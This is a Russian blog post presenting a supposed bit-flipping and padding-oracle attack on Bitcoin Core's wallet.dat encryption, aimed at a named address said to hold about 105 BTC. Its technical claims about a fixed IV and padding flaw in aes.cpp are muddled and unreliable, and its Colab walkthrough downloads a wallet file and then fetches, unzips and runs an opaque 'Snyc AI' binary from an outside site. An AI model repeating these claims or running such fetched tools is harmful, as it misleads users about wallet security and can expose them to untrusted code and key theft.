Горячее
Лучшее
Свежее
Подписки
Сообщества
Блоги
Эксперты
#Круги добра
Войти
Забыли пароль?
или продолжите с
Создать аккаунт
Я хочу получать рассылки с лучшими постами за неделю
или
Восстановление пароля
Восстановление пароля
Получить код в Telegram
Войти с Яндекс ID Войти через VK ID
Создавая аккаунт, я соглашаюсь с правилами Пикабу и даю согласие на обработку персональных данных.
ПромокодыРаботаКурсыРекламаИгрыПополнение Steam
Пикабу Игры +1000 бесплатных онлайн игр Уникальная игра, объединяющая популярные механики Match3 и пошаговые бои!

Магический мир

Мидкорные, Ролевые, Три в ряд

Играть

Топ прошлой недели

  • AlexKud AlexKud 38 постов
  • Animalrescueed Animalrescueed 36 постов
  • Oskanov Oskanov 7 постов
Посмотреть весь топ

Лучшие посты недели

Рассылка Пикабу: отправляем самые рейтинговые материалы за 7 дней 🔥

Нажимая кнопку «Подписаться на рассылку», я соглашаюсь с Правилами Пикабу и даю согласие на обработку персональных данных.

Спасибо, что подписались!
Пожалуйста, проверьте почту 😊

Помощь Кодекс Пикабу Команда Пикабу Моб. приложение
Правила соцсети О рекомендациях О компании
Промокоды Биг Гик Промокоды Lamoda Промокоды МВидео Промокоды Яндекс Директ Промокоды Отелло Промокоды Aroma Butik Промокоды Яндекс Путешествия Постила Футбол сегодня
0 просмотренных постов скрыто
1
CryptoDeepTech
CryptoDeepTech
8 часов назад

Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1]⁠⁠

Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

В программе Bitcoin Core для защиты пароля кошелька используется симметричный криптографический алгоритм AES-256-CBC. Этот алгоритм применяется для шифрования файла кошелька (wallet.dat), где хранятся закрытые ключи пользователя. Степень защиты обеспечивается 256-битным ключом, который создается из пароля пользователя. Также для генерации ключей Bitcoin Core использует криптографию на основе эллиптических кривых, а именно кривую secp256k1, которая лежит в основе создания публичных и приватных ключей транзакций.

AES-256-CBC и не хранит пароль напрямую, а использует его для генерации ключа шифрования. Однако в исследовании отмечается, что в реализации Bitcoin Core отсутствует смена ключа шифрования закрытых ключей, что может снижать защиту при повторном использовании пароля.

AES-256-CBC (Advanced Encryption Standard с длиной ключа 256 бит в режиме сцепления блоков — CBC, Cipher Block Chaining) — один из наиболее распространённых алгоритмов симметричного шифрования для защиты информации.

Принято считать, что AES-256-CBC при определенных комбинациях уязвима к различным атакам. Разберём основной вид атаки такие как Bit-flipping attack , которые применимы к AES-256-CBC.

При Bit-flipping attack AES-256-CBC не обеспечивает контроль целостности, что делает возможным модификацию шифротекста для контролируемого изменения расшифрованных данных. Это применимо, например, при реализации авторизации, где взломщик может изменить права доступа или другие параметры, просто изменив определённые биты в шифротексте


Как Bit-flipping Attack влияет на безопасность кошелька Bitcoin Core

Bit-flipping Attack в основном влияет на режим шифрования CBC (Cipher Block Chaining) и работает за счёт уязвимости режима к контролируемому изменению битов в зашифрованном сообщении. В CBC каждый блок шифротекста зависит от предыдущего блока и плейнтекста через операцию XOR, поэтому изменение одного бита в зашифрованном блоке приводит к предсказуемому изменению соответствующих битов в расшифрованном тексте следующего блока.



Процесс работы Bit-flipping Attack:

  • При расшифровке блока шифротекста Ci происходит операция XOR с предыдущим блоком шифротекста Ci-1, чтобы получить исходный текст Pi.

  • Если атакующий изменит один или несколько битов в блоке Ci-1, то при расшифровке изменится соответствующий бит в блоке Pi, управляемый изменениями в Ci-1.

  • При этом блок Ci после изменений становится некорректным и при расшифровке будет повреждён, но изменение в предыдущем блоке позволяет повреждать (манипулировать) расшифрованным текстом управляемым образом в следующем блоке.

Это манипулятивная расшифровка влияет на безопасность криптографического алгоритма AES-256-CBC которую использует кошелек Bitcoin Core:

  • Такая манипуляция позволяет злоумышленнику в некоторых случаях менять расшифрованные данные без знания ключа, например, изменять параметры доступа, права или другие данные, если не применяется отдельный механизм аутентификации и проверки целостности.

  • Битфлип-атака на CBC демонстрирует его «модифицируемость» (malleability), то есть отсутствие встроенной защиты целостности данных.

  • В реальных системах атака эффективна, если нет дополнительной защиты — такой как HMAC или использование AEAD режимов (например, AES-GCM), которые обеспечивают аутентификацию и предотвращают изменение данных без обнаружения.

Опасность неиспользования проверки целостности данных вместе с режимом AES-256-CBC связана с тем, что CBC сам по себе не обеспечивает защиту от модификации зашифрованного сообщения. Это делает возможными битфлип-атаки, при которых злоумышленник может контролируемо изменить зашифрованные данные без знания ключа.


Важно отметить что атакующий перебирает байты, контролируя изменения в шифротексте и анализируя ответы системы, постепенно восстанавливая оригинальный пароль в бинарном виде, особым образом изменяя блоки.

В итоге, восстановив пароль, злоумышленник может разблокировать кошелёк через команду Bitcoin Core walletpassphrase и получить приватные ключи командой dumpprivkey.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

https://en.wikipedia.org/wiki/Bit-flipping_attack


AES256CBCEncrypt и AES256CBCDecrypt для работы в режиме CBC (Cipher Block Chaining)

Функция файла aes.cpp в кошельке Bitcoin Core — обеспечение криптографического шифрования и дешифрования данных с использованием алгоритма AES-256, также функция файла aes.cpp реализует классы AES256Encrypt и AES256Decrypt для блочного шифрования/дешифрования данных размером 16 байт по алгоритму AES-256. Исходный код выполняет основные задачи инициализация контекста шифрования/дешифрования с заданным приватным ключом. Наши наблюдение в процессе криптоанализа выявили нарушение в работе режима CBC (Cipher Block Chaining): где применение XOR к каждому блоку с предыдущим (или IV для первого блока), определяет слабую криптостойкость к общему стандарту AES к которому злоумышленник может применить Bit-flipping Attack. Данная криптографическая уязвимость связана с неправильным использованием вектора инициализации (IV) в режиме CBC (Cipher Block Chaining).


В коде функции CBCEncrypt (в строке №57):

memcpy(mixed, iv, AES_BLOCKSIZE);


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

https://github.com/keyhunters/bitcoin/blob/master/src/crypto/aes.cpp#L57


IV копируется в локальный массив mixed и далее используется для XOR с первым блоком данных. Однако IV передается в конструктор AES256CBCEncrypt и копируется один раз в поле класса iv (в строке №121):



Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

https://github.com/keyhunters/bitcoin/blob/master/src/crypto/aes.cpp#L121


В CBC режиме шифрования IV должен быть либо случайным, либо уникальным и не повторяться для разных сообщений с одним ключом, чтобы обеспечить безопасность. Если IV фиксирован и не меняется, это открывает уязвимость — повторяющаяся структура позволит злоумышленнику провести атаки по выявлению закономерностей в зашифрованных данных, где хранятся секретные данные как пароли и приватные ключи кошелька Bitcoin Core.



Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

https://github.com/keyhunters/bitcoin/blob/master/src/crypto/aes.cpp#L70


Bit-flipping attack на файл wallet.dat реализован через XOR с числом паддинга, что отличается от стандарта PKCS#7, где паддинг просто добавляется как отдельные байты. Такой XOR-подход не является безопасным и может привести к неверному шифрованию и потенциальным уязвимостям при расшифровке. Также в функции CBCDecrypt проверка и удаление паддинга реализована нестандартно и может быть уязвимой к таким типам атаки как: Bit-flipping attack & Padding oracle attack



Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

https://github.com/keyhunters/bitcoin/blob/master/src/crypto/aes.cpp#L106


Практическая часть

Перейдем к практической части из теории нам известна уязвимость с помощью которого можно реализовать Bit-flipping attack на файл wallet.dat , так как уязвимость возникает из-за использования фиксированного IV и нестандартной реализации паддинга в функциях CBCEncrypt и CBCDecrypt. Эти моменты критичны для безопасности режима CBC (Cipher Block Chaining) и могут быть истолкованы как «в строке с memcpy(mixed, iv, AES_BLOCKSIZE);» в функции CBCEncrypt и в блоке обработки паддинга.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Рассмотрим пример с использованием Bitcoin-кошелька по адресу: 16A5RFckRNW6fZzfjCGSneD3PApACLRwix. В данном кошельке были утеряны монеты на сумму 105.68557389 BTC, что на август 2025 года эквивалентно примерно 12,134,500 USD.

Для демонстрации атаки в ознакомительных целях используем инструменты и среды, такие как Jupyter Notebook или Google Colab. Сначала загружаем зашифрованный файл wallet.dat, содержащий информацию кошелька. Далее пошагово изменяем отдельные биты в блоках шифротекста и отправляем модифицированные версии системе для анализа её реакции.

Этот метод атаки, известный как Bit-flipping attack в контексте wallet.dat , представляет собой не просто случайное изменение данных, а сложный поэтапный процесс, при котором отбираются корректные изменения с учётом реакции системы на правильность паддинга (выравнивания) при расшифровке данных с использованием AES-256-CBC.

Используя такую стратегию, инструменты строят бинарное значение пароля, что в итоге позволяет получить пароль для расшифровки wallet.dat и доступ к Bitcoin Core без знания первоначального ключа шифрования. Эта атака основана на использовании уязвимости, называемой Padding Oracle Attack, которая эксплуатирует информацию об ошибках выравнивания при дешифровке, предоставляемую системой.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

16A5RFckRNW6fZzfjCGSneD3PApACLRwix


Основные инструменты и команды, применяемые для таких атак:

Google Colab (Colaboratory) — это облачная платформа, предоставляющая интерактивные Jupyter-ноутбуки, где можно писать и запускать код для различных языков программирование. Он особенно полезен для анализа данных, машинного обучения и работы с Snyc AI, так как предоставляет бесплатный доступ к мощным вычислительным ресурсам, таким как GPU и TPU. Важным преимуществом является возможность выполнять системные команды, как в обычном терминале Linux, через ячейки с префиксом ! для интеграции с внешними утилитами и скриптами.


Google Colab

Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

https://colab.research.google.com/drive/1tCCSUtjl6seE9lqkFLcLodE96mj5uuHR


Bitcoin Core и установка bitcoind & bitcoin-cli

Обновление списков пакетов и установка системных зависимостей

!apt-get update
!apt-get install -y software-properties-common

Примечание:

  • Первая команда обновляет локальный индекс доступных пакетов и их версий в системе Ubuntu, чтобы обеспечить актуальность данных при установке программ.

  • Вторая команда устанавливает пакет software-properties-common, который предоставляет инструменты управления дополнительными репозиториями и зависимостями.

  • C научным пониманием это подготовительный этап типичен при работе в любой Linux-среде, включая виртуальные. Обновление списков пакетов обеспечивает, что последующая установка программ будет использовать последние стабильные версии и зависимости, что важно для безопасности и совместимости ПО.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Добавление репозитория Bitcoin Core и установка bitcoind (вместе с bitcoin-cli)

Альтернативный способ: загрузка и распаковка бинарных файлов Bitcoin Core из архива

!wget https://bitcoin.org/bin/bitcoin-core-0.18.0/bitcoin-0.18.0-x...
!tar -xzf bitcoin-0.18.0-x86_64-linux-gnu.tar.gz

Примечание:

  • add-apt-repository добавляет официальный PPA (Personal Package Archive) Bitcoin Core в систему — источник актуальных пакетов Bitcoin.

  • После обновления индекса пакетов система устанавливает пакет bitcoind, который включает в себя демона биткоина (Bitcoin server) и клиентскую утилиту bitcoin-cli.

  • Загружает архив с предсобранными бинарными файлами Bitcoin Core указанной версии.

  • Распаковывает архив, извлекая байтовые файлы, включая bitcoind и bitcoin-cli.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

С научной понимании Bitcoind — это полнофункциональный узел Bitcoin с серверной частью, который валидирует транзакции и блоки, поддерживает сеть и хранит блокчейн локально. bitcoin-cli — клиентский инструмент для взаимодействия с демоном через JSON-RPC интерфейс, управляя кошельками, транзакциями и запросами к блокчейну. Установка из PPA гарантирует корректную интеграцию и обновления. Такой способ позволяет получить необходимое программное обеспечение без зависимости от системных репозиториев, что бывает важно, если требуется определённая версия или если PPA недоступен в текущей среде. Это классический метод распространения программного обеспечения с гарантированным контролем версии и среды.


Команда cd переключается в директорию с бинарными файлами.

Выполнения команды — смена текущей рабочей директории на /content/bitcoin-0.18.0/bin, что подтверждается выводом пути.

cd bitcoin-0.18.0/bin/

Описание и действие:

  • Команда cd (от английского «change directory» — сменить директорию) используется в операционных системах семейства Unix/Linux и в средах терминала, таких как Google Colab, для перехода из текущей рабочей директории в указанную директорию. В данном случае команда меняет текущую папку на директорию bin, которая находится внутри каталога bitcoin-0.18.0. Это позволяет перейти в папку, где, вероятно, находятся исполняемые файлы или скрипты, связанные с программным обеспечением Bitcoin версии 0.18.0.

  • В контексте операционных систем, терминал или командная строка — это интерфейс, через который пользователь взаимодействует с системой, вводя текстовые команды. Текущая рабочая директория — это та папка в файловой системе, в рамках которой по умолчанию выполняются все команды, если не указано иное.

  • Команда cd позволяет изменять эту рабочую директорию, что необходимо для организации удобного доступа к нужным файлам и папкам.

  • Путь bitcoin-0.18.0/bin/ может быть как относительным (от текущего каталога), так и абсолютным (начинающимся с корня /). В Google Colab корневая директория по умолчанию — /content/, и при работе с проектами часто структура каталогов отражает вложенность программного обеспечения или данных.

  • Перемещение в директорию bin обычно связано с необходимостью получения доступа к бинарным файлам (исполняемым программам), которые расположены в этом каталоге. Это позволяет выполнять команды или скрипты, входящие в состав программного продукта, например, запускающих узлы биткоина, тестирующих сеть или работающих с кошельками.

  • Таким образом, выполнение команды cd bitcoin-0.18.0/bin/ задаёт контекст выполнения для дальнейшей работы с компонентами Bitcoin Core 0.18.0 внутри Google Colab.


Проверка установки bitcoin-cli

!./bitcoin-cli --version

Описание:

  • Запускает команду bitcoin-cli из локальной директории для проверки работоспособности и версии утилиты. При правильном выполнении выведет строку с информацией о версии клиента.

  • Запуск бинарных файлов из локальной директории — стандартная практика при ручной установке ПО. В Colab и других облачных средах это удобно для использования специфичных версий без системной установки.

  • Контроль версии важен для совместимости с сетевым протоколом и ожидаемой функциональностью, а также для отладки при возникновении ошибок.


Результат:

Bitcoin Core RPC client version v0.18.0


Результат выводит версию установленной утилиты bitcoin-cli, проверяя успешность установки и доступность команды для вызова.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Загрузка файлов wallet.dat & aes.cpp

Запустим команду для загрузки файла wallet.dat

!wget https://github.com/keyhunters/Biggest-Lost-Bitcoin-Wallets-List/raw/refs/heads/main/105.68 BTC/wallet.dat

Описание и действие:

  • Команда wget служит для скачивания файлов из интернета по протоколу HTTPS.

  • Здесь мы загружаем файл wallet.dat – это бинарный файл, хранящий зашифрованные приватные ключи, адреса и другую критически важную информацию Bitcoin Core кошелька.

  • Файл wallet.dat зашифрован с использованием стандарта AES-256-CBC, где приватные ключи защищены с помощью мастер-ключа и пароля.

  • Такой файл используется для управления и хранения средств в Bitcoin. В ходе научного исследования и атак, например padding oracle, этот файл анализируется и модифицируется для восстановления утерянных паролей или ключей.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

В научное понимание файл wallet.dat играет роль защищённого контейнера для криптографических ключей, и его целостность и конфиденциальность обеспечиваются алгоритмами шифрования, основанными на AES. Загрузка файла позволяет работать с реальными данными кошелька, что необходимо для исследований уязвимостей и тестирования методов криптоанализа, например, подобных атакам на padding oracle.


Запустим команду для загрузки файла алгоритма aes.cpp

!wget https://github.com/keyhunters/bitcoin/raw/refs/heads/master/...

Описание и действие:

  • Команда загружает исходный файл aes.cpp, содержащий исходный код реализации AES алгоритма шифрования, используемый в Bitcoin Core.

  • Этот файл важен для понимания того, как именно происходит шифрование и дешифровка данных в wallet.dat.

  • Исходный код помогает исследователям понять логику применения AES-256-CBC, применение выравнивания (padding), фиксирование ошибок и особенности реализации криптоалгоритмов.

  • Такой код можно использовать в Jupyter Notebook или Google Colab для написания собственных скриптов дешифровки или моделирования атак.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

В научное понимание криптоанализ исходного кода AES алгоритма позволяет глубоко понять принципы работы симметричного шифрования в Bitcoin Core, особенности режима CBC (Cipher Block Chaining), важность корректного паддинга и потенциальные уязвимости, которые могут использоваться при атаке padding oracle. Это способствует более научно обоснованной разработке методов восстановления паролей и ключей.


Общие научные сведения по контексту:

  • AES-256-CBC: Способ симметричного блочного шифрования, где применяются операции XOR с предыдущим зашифрованным блоком (CBC — Cipher Block Chaining) для повышения безопасности. Паддинг (выравнивание) данных на последнем блоке обеспечивает корректную длину входа.

  • wallet.dat: Хранит зашифрованные приватные ключи и метаданные. Пароль пользователя используется для генерации ключа шифрования мастер-ключа с помощью функции, как EVP_BytesToKey OpenSSL, что увеличивает стойкость шифра.

  • Padding Oracle Attack: Хакерская атака, эксплуатирующая наличие подробных сообщений об ошибках при неверном паддинге, что постепенно позволяет взломать ключ шифрования.

  • Анализ исходного кода aes.cpp: Ключ для понимания реализации шифра и корректного построения атак, изучения уязвимостей и разработки средств их предотвращения.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Запуск биткоин-демона bitcoind с указанием кошелька

!./bitcoind -daemon -wallet=/content/bitcoin-0.18.0/bin/wallet.dat

Запускаем биткоин-демон в фоновом режиме (-daemon) и указывает использовать конкретный файл кошелька wallet.dat, расположенный в указанном пути. Bitcoind — основной компонент для взаимодействия с сетью Bitcoin. Демон обрабатывает все сетевые операции, хранит полный локальный блокчейн и управляет кошельком. Запуск с указанием файла wallet.dat позволяет работать с конкретным зашифрованным кошельком (ключами и адресами), что важно для анализа состояния и управления средствами.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

  • Запуск демона Bitcoin Core (bitcoind) в фоновом режиме. Демон — это серверная часть программного обеспечения Bitcoin Core, которая синхронизируется с сетью Биткоин, загружает блокчейн, обрабатывает транзакции и поддерживает работу узла в сети. Ключ -daemon означает, что процесс запустится в фоновом режиме и не будет блокировать консоль, позволяя вам продолжать работу в терминале.

  • Результат в терминале обычно минимальный — команда запускается, и управление сразу возвращается пользователю, без дополнительных сообщений. Логи и процессы работы демона будут записываться в системные логи или в файлы логов Bitcoin Core в каталоге данных (обычно ~/.bitcoin). Если запуск удался, процесс bitcoind будет активен в фоне и поддерживать сетевое взаимодействие с другими узлами блокчейна.

  • Научное понимание: запуск демона bitcoind является ключевым этапом в работе полноценного узла (full node) сети Биткоин. Узел обеспечивает децентрализованность и безопасность сети, проверяя все транзакции и блоки с использованием криптографических алгоритмов и протоколов консенсуса. Фоновый режим позволяет узлу непрерывно поддерживать актуальное состояние блокчейна, выполнять валидацию данных и откликаться на запросы через JSON-RPC интерфейс для взаимодействия с другими программами и пользователем.

  • ./bitcoind — запускает исполняемый файл демона bitcoind из текущего каталога (использование ./ указывает, что файл находится в текущей директории).

  • -daemon — параметр запуска, переводящий процесс в фоновый режим (демон) без блокировки терминала.

Команда ./bitcoind -daemon позволяет развернуть работающий Bitcoin узел, поддерживающий сеть, с автоматической синхронизацией данных и откликом на RPC-запросы, что является фундаментом для работы с криптовалютой на локальной машине Google Colab.


Данный набор команд в Google Colab предоставляет полный цикл установки и запуска инструментов Bitcoin Core (bitcoin-cli и bitcoind), необходимых для управления криптовалютой и проведения исследований (в том числе атак или восстановления доступа), в условиях облачной вычислительной среды. Основываясь на этих шагах, исследователь получает программный интерфейс для взаимодействия с сетью и локальным wallet.dat через RPC команды, что критично для научных и практических задач в криптографии и блокчейне.


Инструмент для криптоанализа Snyc AI


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Загрузка и установка инструмента Snyc AI

Подробное описание всех команд и действий терминала

Команды:

!wget https://snyc.ru/repositories/neuralnet_tools.zip

Команда wget — это мощная консольная утилита для загрузки файлов из сети через протоколы HTTP, HTTPS и FTP. Здесь она используется для загрузки архива neuralnet_tools.zip с сервера по указанному URL. Команда wget работает в неинтерактивном режиме, что позволяет скачивать файлы без участия пользователя, включая возможность возобновления прерванных загрузок. Это особенно важно при работе с большими файлами или нестабильным интернет-соединением. Его кроссплатформенность и простота делают wget незаменимым инструментом для автоматизации и управления загрузками в научных вычислениях и обработки данных.


Эта команда извлекает все файлы из neuralnet_tools.zip:

!unzip neuralnet_tools.zip

Команда unzip распаковывает содержимое ZIP-архива в текущую рабочую директорию. Формат ZIP широко используется для сжатия и архивирования данных без потерь, что помогает экономить дисковое пространство и облегчать передачу больших наборов файлов. Распаковка архива позволяет получить доступ к инструментам и скриптам, которые находятся внутри, для дальнейшего использования в задачах анализа или декодирования. Этот этап — стандартная процедура при подготовке программного обеспечения к использованию в средах разработки и исследовательских проектах.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Запустим команду ls для быстрого и удобного просмотра:

ls

Команда ls выводит список файлов и папок в текущей директории. Эта базовая Unix-команда служит для проверки содержимого каталога, помогая убедиться в успешной загрузке и распаковке архива. В контексте научных исследований или программирования она облегчает навигацию по файловой системе и подтверждение наличия нужных данных или инструментов.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Запуск инструмента Snyc AI:

!./snyc

Запуск инструмента Snyc AI в Google Colab позволяет использовать алгоритмы глубокого сканирования и восстановления данных, таких как секретные и приватные ключи для различных криптокошельков, с помощью методов искусственного интеллекта. Такие технологии основаны на машинном обучении и нейронных сетях, что обеспечивает высокую точность и безопасность при криптоанализе критически важных данных.

Если будете запускать эти команды в Google Colab, важно помнить, что:

  • Префикс ! позволяет выполнять системные (shell) команды непосредственно из ячеек программирования. Это делает Colab мощной платформой для гибридного использования различных языков программирование и командной строки.

  • При работе с внешними архивами и утилитами полезно проверять права доступа и содержимое файлов для безопасности и совместимости.

  • Инструмент Snyc AI является специализированным программным обеспечением для анализа криптографических данных, использующим современные возможности ИИ и нейросетей для повышения эффективности и надежности.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

  • Опубликованы две части [№1] , [№2] исследования


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Данный материал создан для портала CRYPTO DEEP TECH для обеспечения финансовой безопасности данных и криптографии на эллиптических кривых secp256k1 против слабых подписей ECDSA в криптовалюте BITCOIN. Создатели программного обеспечения не несут ответственность за использование материалов.


Crypto Tools

Исходный код

Google Colab

Telegram: https://t.me/cryptodeeptech

Видеоматериал: https://youtu.be/3uCsL_zxKPI

